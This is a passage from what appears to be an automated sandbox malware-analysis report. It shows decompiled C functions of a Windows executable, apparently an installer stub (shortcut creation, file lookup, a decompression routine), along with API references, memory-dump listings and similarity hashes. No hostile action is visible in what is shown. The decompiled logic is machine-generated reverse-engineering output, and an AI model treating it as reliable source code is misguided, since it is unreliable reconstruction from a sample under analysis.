                                                                                              							_t81 =  *(_t100 - 0x14);
                                                                                              						}
                                                                                              						_t59 =  *((intOrPtr*)(_t100 + 8));
                                                                                              						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
                                                                                              						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 8)))) != _t75) {
                                                                                              							_t71 =  *((intOrPtr*)(_t100 + 8));
                                                                                              							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 8)),  *(_t100 - 0x14) & 0x000000ff);
                                                                                              						}
                                                                                              						_t62 =  *((intOrPtr*)(_t100 + 8));
                                                                                              						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
                                                                                              						_t64 =  *((intOrPtr*)(_t100 + 8));
                                                                                              						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
                                                                                              						if(_t95 >= _t75) {
                                                                                              							_t95 = 0x80004005;
                                                                                              							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409370, 0x400) != 0) {
                                                                                              								_t69 =  *((intOrPtr*)(_t100 - 0x34));
                                                                                              								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409370, 1);
                                                                                              							}
                                                                                              						}
                                                                                              						_t66 =  *((intOrPtr*)(_t100 - 0x34));
                                                                                              						 *((intOrPtr*)( *_t66 + 8))(_t66);
                                                                                              					}
                                                                                              					_t50 =  *((intOrPtr*)(_t100 + 8));
                                                                                              					 *((intOrPtr*)( *_t50 + 8))(_t50);
                                                                                              					if(_t95 >= _t75) {
                                                                                              						_push(0xfffffff4);
                                                                                              					} else {
                                                                                              						goto L13;
                                                                                              					}
                                                                                              				}
                                                                                              				E00401423();
                                                                                              				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t100 - 4));
                                                                                              				return 0;
                                                                                              			}





















                                                                                              0x0040214b
                                                                                              0x00402156
                                                                                              0x00402880
                                                                                              0x0040288c

                                                                                              APIs
                                                                                              • CoCreateInstance.OLE32(00407490,?,00000001,00407480,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402065
                                                                                              • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409370,00000400,?,00000001,00407480,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040211F
                                                                                              Strings
                                                                                              • C:\Users\user\AppData\Local\Temp, xrefs: 0040209D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: ByteCharCreateInstanceMultiWide
                                                                                              • String ID: C:\Users\user\AppData\Local\Temp
                                                                                              • API String ID: 123533781-1943935188
                                                                                              • Opcode ID: 2ca65707f57f31f88cc6a7fd1c1688d70cf0f88a2c7737c03cbde538d7105c3f
                                                                                              • Instruction ID: 24f6ed1ac1c0c168ca35b22597f39d8cd9e85fbc7861a3d68fdd8e416dd3802a
                                                                                              • Opcode Fuzzy Hash: 2ca65707f57f31f88cc6a7fd1c1688d70cf0f88a2c7737c03cbde538d7105c3f
                                                                                              • Instruction Fuzzy Hash: E2414DB5A00104AFCB00DFA4CD89E9E7BB9EF49354B20416AF505EB2E1DA79ED41CB64
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E6F1E2A02(struct _EXCEPTION_POINTERS* _a4) {
                                                                                              
                                                                                              				SetUnhandledExceptionFilter(0);
                                                                                              				return UnhandledExceptionFilter(_a4);
                                                                                              			}



                                                                                              0x6f1e2a07
                                                                                              0x6f1e2a17

                                                                                              APIs
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,6F1E5308,6F1EC9A8,00000001,?,6F1E541F,6F1EC9A8,00000017), ref: 6F1E2A07
                                                                                              • UnhandledExceptionFilter.KERNEL32(6F1EC9A8,?,6F1E5308,6F1EC9A8,00000001,?,6F1E541F,6F1EC9A8,00000017), ref: 6F1E2A10
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.270197263.000000006F1D1000.00000020.00020000.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                              • Associated: 00000001.00000002.270187665.000000006F1D0000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270265114.000000006F1EB000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270285453.000000006F1F2000.00000040.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270301108.000000006F1F4000.00000008.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270320448.000000006F1F6000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270328902.000000006F1FA000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                              • String ID:
                                                                                              • API String ID: 3192549508-0
                                                                                              • Opcode ID: 5014002abdb57376540c35f17ae6ae4b0513d6e4c1bc948b3fed27e3ca2b9a65
                                                                                              • Instruction ID: bb7030efbbe2080f875a7c442606d5cc1f7b0f571330fc406bee0e7d2752221c
                                                                                              • Opcode Fuzzy Hash: 5014002abdb57376540c35f17ae6ae4b0513d6e4c1bc948b3fed27e3ca2b9a65
                                                                                              • Instruction Fuzzy Hash: 8CB0923104470CABCF016BD1D80ABCC3F38EB066F2F008011F61E440609B6366208A91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 39%
                                                                                              			E00402630(char __ebx, char* __edi, char* __esi) {
                                                                                              				void* _t19;
                                                                                              
                                                                                              				if(FindFirstFileA(E004029E8(2), _t19 - 0x1a4) != 0xffffffff) {
                                                                                              					E00405889(__edi, _t6);
                                                                                              					_push(_t19 - 0x178);
                                                                                              					_push(__esi);
                                                                                              					E0040592B();
                                                                                              				} else {
                                                                                              					 *__edi = __ebx;
                                                                                              					 *__esi = __ebx;
                                                                                              					 *((intOrPtr*)(_t19 - 4)) = 1;
                                                                                              				}
                                                                                              				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t19 - 4));
                                                                                              				return 0;
                                                                                              			}





                                                                                              APIs
                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040263F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: FileFindFirst
                                                                                              • String ID:
                                                                                              • API String ID: 1974802433-0
                                                                                              • Opcode ID: 0eff392dd80b659ea035236535e3ff8102da578794157fa10522713e52998ada
                                                                                              • Instruction ID: 00d369c81b6f5d5ac2b66fc3ece6c10e84ddf32e85f5a3588956fe302b8fe543
                                                                                              • Opcode Fuzzy Hash: 0eff392dd80b659ea035236535e3ff8102da578794157fa10522713e52998ada
                                                                                              • Instruction Fuzzy Hash: 18F0A0726081009EE700EBB59949EFEB768DF21324F6045BBF111B20C1C3B88946DA2A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 79%
                                                                                              			E00406043(signed int __ebx, signed int* __esi) {
                                                                                              				signed int _t396;
                                                                                              				signed int _t425;
                                                                                              				signed int _t442;
                                                                                              				signed int _t443;
                                                                                              				signed int* _t446;
                                                                                              				void* _t448;
                                                                                              
                                                                                              				L0:
                                                                                              				while(1) {
                                                                                              					L0:
                                                                                              					_t446 = __esi;
                                                                                              					_t425 = __ebx;
                                                                                              					if( *(_t448 - 0x34) == 0) {
                                                                                              						break;
                                                                                              					}
                                                                                              					L55:
                                                                                              					__eax =  *(__ebp - 0x38);
                                                                                              					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                              					__ecx = __ebx;
                                                                                              					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                              					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                              					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                              					__ebx = __ebx + 8;
                                                                                              					while(1) {
                                                                                              						L56:
                                                                                              						if(__ebx < 0xe) {
                                                                                              							goto L0;
                                                                                              						}
                                                                                              						L57:
                                                                                              						__eax =  *(__ebp - 0x40);
                                                                                              						__eax =  *(__ebp - 0x40) & 0x00003fff;
                                                                                              						__ecx = __eax;
                                                                                              						__esi[1] = __eax;
                                                                                              						__ecx = __eax & 0x0000001f;
                                                                                              						if(__cl > 0x1d) {
                                                                                              							L9:
                                                                                              							_t443 = _t442 | 0xffffffff;
                                                                                              							 *_t446 = 0x11;
                                                                                              							L10:
                                                                                              							_t446[0x147] =  *(_t448 - 0x40);
                                                                                              							_t446[0x146] = _t425;
                                                                                              							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
                                                                                              							L11:
                                                                                              							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
                                                                                              							_t446[0x26ea] =  *(_t448 - 0x30);
                                                                                              							E004067B2( *(_t448 + 8));
                                                                                              							return _t443;
                                                                                              						}
                                                                                              						L58:
                                                                                              						__eax = __eax & 0x000003e0;
                                                                                              						if(__eax > 0x3a0) {
                                                                                              							goto L9;
                                                                                              						}
                                                                                              						L59:
                                                                                              						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
                                                                                              						__ebx = __ebx - 0xe;
                                                                                              						_t94 =  &(__esi[2]);
                                                                                              						 *_t94 = __esi[2] & 0x00000000;
                                                                                              						 *__esi = 0xc;
                                                                                              						while(1) {
                                                                                              							L60:
                                                                                              							__esi[1] = __esi[1] >> 0xa;
                                                                                              							__eax = (__esi[1] >> 0xa) + 4;
                                                                                              							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                                                                              								goto L68;
                                                                                              							}
                                                                                              							L61:
                                                                                              							while(1) {
                                                                                              								L64:
                                                                                              								if(__ebx >= 3) {
                                                                                              									break;
                                                                                              								}
                                                                                              								L62:
                                                                                              								if( *(__ebp - 0x34) == 0) {
                                                                                              									goto L182;
                                                                                              								}
                                                                                              								L63:
                                                                                              								__eax =  *(__ebp - 0x38);
                                                                                              								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                              								__ecx = __ebx;
                                                                                              								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                              								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                              								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                              								__ebx = __ebx + 8;
                                                                                              							}
                                                                                              							L65:
                                                                                              							__ecx = __esi[2];
                                                                                              							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
                                                                                              							__ebx = __ebx - 3;
                                                                                              							_t108 = __ecx + 0x407374; // 0x121110
                                                                                              							__ecx =  *_t108;
                                                                                              							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
                                                                                              							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
                                                                                              							__ecx = __esi[1];
                                                                                              							__esi[2] = __esi[2] + 1;
                                                                                              							__eax = __esi[2];
                                                                                              							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
                                                                                              							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
                                                                                              								goto L64;
                                                                                              							}
                                                                                              							L66:
                                                                                              							while(1) {
                                                                                              								L68:
                                                                                              								if(__esi[2] >= 0x13) {
                                                                                              									break;
                                                                                              								}
                                                                                              								L67:
                                                                                              								_t119 = __esi[2] + 0x407374; // 0x4000300
                                                                                              								__eax =  *_t119;
                                                                                              								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
                                                                                              								_t126 =  &(__esi[2]);
                                                                                              								 *_t126 = __esi[2] + 1;
                                                                                              							}
                                                                                              							L69:
                                                                                              							__ecx = __ebp - 8;
                                                                                              							__edi =  &(__esi[0x143]);
                                                                                              							 &(__esi[0x148]) =  &(__esi[0x144]);
                                                                                              							__eax = 0;
                                                                                              							 *(__ebp - 8) = 0;
                                                                                              							__eax =  &(__esi[3]);
                                                                                              							 *__edi = 7;
                                                                                              							__eax = E0040681A( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
                                                                                              							if(__eax != 0) {
                                                                                              								L72:
                                                                                              								 *__esi = 0x11;
                                                                                              								while(1) {
                                                                                              									L180:
                                                                                              									_t396 =  *_t446;
                                                                                              									if(_t396 > 0xf) {
                                                                                              										break;
                                                                                              									}
                                                                                              									L1:
                                                                                              									switch( *((intOrPtr*)(_t396 * 4 +  &M00406772))) {
                                                                                              										case 0:
                                                                                              											L101:
                                                                                              											__eax = __esi[4] & 0x000000ff;
                                                                                              											__esi[3] = __esi[4] & 0x000000ff;
                                                                                              											__eax = __esi[5];
                                                                                              											__esi[2] = __esi[5];
                                                                                              											 *__esi = 1;
                                                                                              											goto L102;
                                                                                              										case 1:
                                                                                              											L102:
                                                                                              											__eax = __esi[3];
                                                                                              											while(1) {
                                                                                              												L105:
                                                                                              												__eflags = __ebx - __eax;
                                                                                              												if(__ebx >= __eax) {
                                                                                              													break;
                                                                                              												}
                                                                                              												L103:
                                                                                              												__eflags =  *(__ebp - 0x34);
                                                                                              												if( *(__ebp - 0x34) == 0) {
                                                                                              													goto L182;
                                                                                              												}
                                                                                              												L104:
                                                                                              												__ecx =  *(__ebp - 0x38);
                                                                                              												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                              												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                              												__ecx = __ebx;
                                                                                              												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                              												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                              												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                              												__ebx = __ebx + 8;
                                                                                              												__eflags = __ebx;
                                                                                              											}
                                                                                              											L106:
                                                                                              											__eax =  *(0x409340 + __eax * 2) & 0x0000ffff;
                                                                                              											__eax = __eax &  *(__ebp - 0x40);
                                                                                              											__ecx = __esi[2];
                                                                                              											__eax = __esi[2] + __eax * 4;
                                                                                              											__ecx =  *(__eax + 1) & 0x000000ff;
                                                                                              											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                              											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                                                                              											__ecx =  *__eax & 0x000000ff;
                                                                                              											__eflags = __ecx;
                                                                                              											if(__ecx != 0) {
                                                                                              												L108:
                                                                                              												__eflags = __cl & 0x00000010;
                                                                                              												if((__cl & 0x00000010) == 0) {
                                                                                              													L110:
                                                                                              													__eflags = __cl & 0x00000040;
                                                                                              													if((__cl & 0x00000040) == 0) {
                                                                                              														goto L125;
                                                                                              													}
                                                                                              													L111:
                                                                                              													__eflags = __cl & 0x00000020;
                                                                                              													if((__cl & 0x00000020) == 0) {
                                                                                              														goto L9;
                                                                                              													}
                                                                                              													L112:
                                                                                              													 *__esi = 7;
                                                                                              													goto L180;
                                                                                              												}
                                                                                              												L109:
                                                                                              												__esi[2] = __ecx;
                                                                                              												__esi[1] = __eax;
                                                                                              												 *__esi = 2;
                                                                                              												goto L180;
                                                                                              											}
                                                                                              											L107:
                                                                                              											__esi[2] = __eax;
                                                                                              											 *__esi = 6;
                                                                                              											goto L180;
                                                                                              										case 2:
                                                                                              											L113:
                                                                                              											__eax = __esi[2];
                                                                                              											while(1) {
                                                                                              												L116:
                                                                                              												__eflags = __ebx - __eax;
                                                                                              												if(__ebx >= __eax) {
                                                                                              													break;
                                                                                              												}
                                                                                              												L114:
                                                                                              												__eflags =  *(__ebp - 0x34);
                                                                                              												if( *(__ebp - 0x34) == 0) {
                                                                                              													goto L182;
                                                                                              												}
                                                                                              												L115:
                                                                                              												__ecx =  *(__ebp - 0x38);
                                                                                              												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                              												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                              												__ecx = __ebx;
                                                                                              												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                              												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                              												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                              												__ebx = __ebx + 8;
                                                                                              												__eflags = __ebx;
                                                                                              											}
                                                                                              											L117:
                                                                                              											 *(0x409340 + __eax * 2) & 0x0000ffff =  *(0x409340 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                                                              											__esi[1] = __esi[1] + ( *(0x409340 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                                                              											__ecx = __eax;
                                                                                              											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                              											__ebx = __ebx - __eax;
                                                                                              											__eflags = __ebx;
                                                                                              											__eax = __esi[4] & 0x000000ff;
                                                                                              											__esi[3] = __esi[4] & 0x000000ff;
                                                                                              											__eax = __esi[6];
                                                                                              											__esi[2] = __esi[6];
                                                                                              											 *__esi = 3;
                                                                                              											goto L118;
                                                                                              										case 3:
                                                                                              											L118:
                                                                                              											__eax = __esi[3];
                                                                                              											while(1) {
                                                                                              												L121:
                                                                                              												__eflags = __ebx - __eax;
                                                                                              												if(__ebx >= __eax) {
                                                                                              													break;
                                                                                              												}
                                                                                              												L119:
                                                                                              												__eflags =  *(__ebp - 0x34);
                                                                                              												if( *(__ebp - 0x34) == 0) {
                                                                                              													goto L182;
                                                                                              												}
                                                                                              												L120:
                                                                                              												__ecx =  *(__ebp - 0x38);
                                                                                              												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                              												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                              												__ecx = __ebx;
                                                                                              												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                              												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                              												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                              												__ebx = __ebx + 8;
                                                                                              												__eflags = __ebx;
                                                                                              											}
                                                                                              											L122:
                                                                                              											__eax =  *(0x409340 + __eax * 2) & 0x0000ffff;
                                                                                              											__eax = __eax &  *(__ebp - 0x40);
                                                                                              											__ecx = __esi[2];
                                                                                              											__eax = __esi[2] + __eax * 4;
                                                                                              											__ecx =  *(__eax + 1) & 0x000000ff;
                                                                                              											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                              											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                                                                              											__ecx =  *__eax & 0x000000ff;
                                                                                              											__eflags = __cl & 0x00000010;
                                                                                              											if((__cl & 0x00000010) == 0) {
                                                                                              												L124:
                                                                                              												__eflags = __cl & 0x00000040;
                                                                                              												if((__cl & 0x00000040) != 0) {
                                                                                              													goto L9;
                                                                                              												}
                                                                                              												L125:
                                                                                              												__esi[3] = __ecx;
                                                                                              												__ecx =  *(__eax + 2) & 0x0000ffff;
                                                                                              												__esi[2] = __eax;
                                                                                              												goto L180;
                                                                                              											}
                                                                                              											L123:
                                                                                              											__esi[2] = __ecx;
                                                                                              											__esi[3] = __eax;
                                                                                              											 *__esi = 4;
                                                                                              											goto L180;
                                                                                              										case 4:
                                                                                              											L126:
                                                                                              											__eax = __esi[2];
                                                                                              											while(1) {
                                                                                              												L129:
                                                                                              												__eflags = __ebx - __eax;
                                                                                              												if(__ebx >= __eax) {
                                                                                              													break;
                                                                                              												}
                                                                                              												L127:
                                                                                              												__eflags =  *(__ebp - 0x34);
                                                                                              												if( *(__ebp - 0x34) == 0) {
                                                                                              													goto L182;
                                                                                              												}
                                                                                              												L128:
                                                                                              												__ecx =  *(__ebp - 0x38);
                                                                                              												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                              												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                              												__ecx = __ebx;
                                                                                              												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                              												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                              												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                              												__ebx = __ebx + 8;
                                                                                              												__eflags = __ebx;
                                                                                              											}
                                                                                              											L130:
                                                                                              											 *(0x409340 + __eax * 2) & 0x0000ffff =  *(0x409340 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                                                              											__esi[3] = __esi[3] + ( *(0x409340 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                                                              											__ecx = __eax;
                                                                                              											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                              											__ebx = __ebx - __eax;
                                                                                              											__eflags = __ebx;
                                                                                              											 *__esi = 5;
                                                                                              											goto L131;
                                                                                              										case 5:
                                                                                              											L131:
                                                                                              											__eax =  *(__ebp - 0x30);
                                                                                              											__edx = __esi[3];
                                                                                              											__eax = __eax - __esi;
                                                                                              											__ecx = __eax - __esi - 0x1ba0;
                                                                                              											__eflags = __eax - __esi - 0x1ba0 - __edx;
                                                                                              											if(__eax - __esi - 0x1ba0 >= __edx) {
                                                                                              												__ecx = __eax;
                                                                                              												__ecx = __eax - __edx;
                                                                                              												__eflags = __ecx;
                                                                                              											} else {
                                                                                              												__esi[0x26e8] = __esi[0x26e8] - __edx;
                                                                                              												__ecx = __esi[0x26e8] - __edx - __esi;
                                                                                              												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
                                                                                              											}
                                                                                              											__eflags = __esi[1];
                                                                                              											 *(__ebp - 0x20) = __ecx;
                                                                                              											if(__esi[1] != 0) {
                                                                                              												L135:
                                                                                              												__edi =  *(__ebp - 0x2c);
                                                                                              												do {
                                                                                              													L136:
                                                                                              													__eflags = __edi;
                                                                                              													if(__edi != 0) {
                                                                                              														goto L152;
                                                                                              													}
                                                                                              													L137:
                                                                                              													__edi = __esi[0x26e8];
                                                                                              													__eflags = __eax - __edi;
                                                                                              													if(__eax != __edi) {
                                                                                              														L143:
                                                                                              														__esi[0x26ea] = __eax;
                                                                                              														__eax = E004067B2( *((intOrPtr*)(__ebp + 8)));
                                                                                              														__eax = __esi[0x26ea];
                                                                                              														__ecx = __esi[0x26e9];
                                                                                              														__eflags = __eax - __ecx;
                                                                                              														 *(__ebp - 0x30) = __eax;
                                                                                              														if(__eax >= __ecx) {
                                                                                              															__edi = __esi[0x26e8];
                                                                                              															__edi = __esi[0x26e8] - __eax;
                                                                                              															__eflags = __edi;
                                                                                              														} else {
                                                                                              															__ecx = __ecx - __eax;
                                                                                              															__edi = __ecx - __eax - 1;
                                                                                              														}
                                                                                              														__edx = __esi[0x26e8];
                                                                                              														__eflags = __eax - __edx;
                                                                                              														 *(__ebp - 8) = __edx;
                                                                                              														if(__eax == __edx) {
                                                                                              															__edx =  &(__esi[0x6e8]);
                                                                                              															__eflags = __ecx - __edx;
                                                                                              															if(__ecx != __edx) {
                                                                                              																__eax = __edx;
                                                                                              																__eflags = __eax - __ecx;
                                                                                              																 *(__ebp - 0x30) = __eax;
                                                                                              																if(__eax >= __ecx) {
                                                                                              																	__edi =  *(__ebp - 8);
                                                                                              																	__edi =  *(__ebp - 8) - __eax;
                                                                                              																	__eflags = __edi;
                                                                                              																} else {
                                                                                              																	__ecx = __ecx - __eax;
                                                                                              																	__edi = __ecx;
                                                                                              																}
                                                                                              															}
                                                                                              														}
                                                                                              														__eflags = __edi;
                                                                                              														if(__edi == 0) {
                                                                                              															goto L183;
                                                                                              														} else {
                                                                                              															goto L152;
                                                                                              														}
                                                                                              													}
                                                                                              													L138:
                                                                                              													__ecx = __esi[0x26e9];
                                                                                              													__edx =  &(__esi[0x6e8]);
                                                                                              													__eflags = __ecx - __edx;
                                                                                              													if(__ecx == __edx) {
                                                                                              														goto L143;
                                                                                              													}
                                                                                              													L139:
                                                                                              													__eax = __edx;
                                                                                              													__eflags = __eax - __ecx;
                                                                                              													if(__eax >= __ecx) {
                                                                                              														__edi = __edi - __eax;
                                                                                              														__eflags = __edi;
                                                                                              													} else {
                                                                                              														__ecx = __ecx - __eax;
                                                                                              														__edi = __ecx;
                                                                                              													}
                                                                                              													__eflags = __edi;
                                                                                              													if(__edi == 0) {
                                                                                              														goto L143;
                                                                                              													}
                                                                                              													L152:
                                                                                              													__ecx =  *(__ebp - 0x20);
                                                                                              													 *__eax =  *__ecx;
                                                                                              													__eax = __eax + 1;
                                                                                              													__ecx = __ecx + 1;
                                                                                              													__edi = __edi - 1;
                                                                                              													__eflags = __ecx - __esi[0x26e8];
                                                                                              													 *(__ebp - 0x30) = __eax;
                                                                                              													 *(__ebp - 0x20) = __ecx;
                                                                                              													 *(__ebp - 0x2c) = __edi;
                                                                                              													if(__ecx == __esi[0x26e8]) {
                                                                                              														__ecx =  &(__esi[0x6e8]);
                                                                                              														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
                                                                                              													}
                                                                                              													_t357 =  &(__esi[1]);
                                                                                              													 *_t357 = __esi[1] - 1;
                                                                                              													__eflags =  *_t357;
                                                                                              												} while ( *_t357 != 0);
                                                                                              											}
                                                                                              											goto L23;
                                                                                              										case 6:
                                                                                              											L156:
                                                                                              											__eax =  *(__ebp - 0x2c);
                                                                                              											__edi =  *(__ebp - 0x30);
                                                                                              											__eflags = __eax;
                                                                                              											if(__eax != 0) {
                                                                                              												L172:
                                                                                              												__cl = __esi[2];
                                                                                              												 *__edi = __cl;
                                                                                              												__edi = __edi + 1;
                                                                                              												__eax = __eax - 1;
                                                                                              												 *(__ebp - 0x30) = __edi;
                                                                                              												 *(__ebp - 0x2c) = __eax;
                                                                                              												goto L23;
                                                                                              											}
                                                                                              											L157:
                                                                                              											__ecx = __esi[0x26e8];
                                                                                              											__eflags = __edi - __ecx;
                                                                                              											if(__edi != __ecx) {
                                                                                              												L163:
                                                                                              												__esi[0x26ea] = __edi;
                                                                                              												__eax = E004067B2( *((intOrPtr*)(__ebp + 8)));
                                                                                              												__edi = __esi[0x26ea];
                                                                                              												__ecx = __esi[0x26e9];
                                                                                              												__eflags = __edi - __ecx;
                                                                                              												 *(__ebp - 0x30) = __edi;
                                                                                              												if(__edi >= __ecx) {
                                                                                              													__eax = __esi[0x26e8];
                                                                                              													__eax = __esi[0x26e8] - __edi;
                                                                                              													__eflags = __eax;
                                                                                              												} else {
                                                                                              													__ecx = __ecx - __edi;
                                                                                              													__eax = __ecx - __edi - 1;
                                                                                              												}
                                                                                              												__edx = __esi[0x26e8];
                                                                                              												__eflags = __edi - __edx;
                                                                                              												 *(__ebp - 8) = __edx;
                                                                                              												if(__edi == __edx) {
                                                                                              													__edx =  &(__esi[0x6e8]);
                                                                                              													__eflags = __ecx - __edx;
                                                                                              													if(__ecx != __edx) {
                                                                                              														__edi = __edx;
                                                                                              														__eflags = __edi - __ecx;
                                                                                              														 *(__ebp - 0x30) = __edi;
                                                                                              														if(__edi >= __ecx) {
                                                                                              															__eax =  *(__ebp - 8);
                                                                                              															__eax =  *(__ebp - 8) - __edi;
                                                                                              															__eflags = __eax;
                                                                                              														} else {
                                                                                              															__ecx = __ecx - __edi;
                                                                                              															__eax = __ecx;
                                                                                              														}
                                                                                              													}
                                                                                              												}
                                                                                              												__eflags = __eax;
                                                                                              												if(__eax == 0) {
                                                                                              													goto L183;
                                                                                              												} else {
                                                                                              													goto L172;
                                                                                              												}
                                                                                              											}
                                                                                              											L158:
                                                                                              											__eax = __esi[0x26e9];
                                                                                              											__edx =  &(__esi[0x6e8]);
                                                                                              											__eflags = __eax - __edx;
                                                                                              											if(__eax == __edx) {
                                                                                              												goto L163;
                                                                                              											}
                                                                                              											L159:
                                                                                              											__edi = __edx;
                                                                                              											__eflags = __edi - __eax;
                                                                                              											if(__edi >= __eax) {
                                                                                              												__ecx = __ecx - __edi;
                                                                                              												__eflags = __ecx;
                                                                                              												__eax = __ecx;
                                                                                              											} else {
                                                                                              												__eax = __eax - __edi;
                                                                                              												__eax = __eax - 1;
                                                                                              											}
                                                                                              											__eflags = __eax;
                                                                                              											if(__eax != 0) {
